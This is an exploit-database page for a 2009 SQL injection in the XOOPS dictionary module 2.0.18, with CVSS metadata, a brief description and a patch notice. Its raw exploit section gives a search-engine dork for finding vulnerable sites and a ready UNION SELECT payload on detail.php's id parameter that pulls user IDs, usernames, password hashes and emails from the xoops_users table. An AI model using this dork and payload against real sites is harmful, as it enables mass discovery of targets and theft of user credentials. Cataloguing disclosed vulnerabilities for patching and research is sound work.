header-logo
Suggest Exploit
vendor:
XOOPS Module dictionary
by:
Palyo34
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: XOOPS Module dictionary
Affected Version From: 2.0.18
Affected Version To: 2.0.18
Patch Exists: Yes
Related CWE: N/A
CPE: a:xoops:xoops_module_dictionary
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability

The vulnerability exists in XOOPS Module dictionary 2.0.18, which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'detail.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script, which will then execute the injected SQL query.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of XOOPS Module dictionary.
Source

Exploit-DB raw data:

##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18 
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#   
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################

Navigation

Suggest Exploit

Services By CQR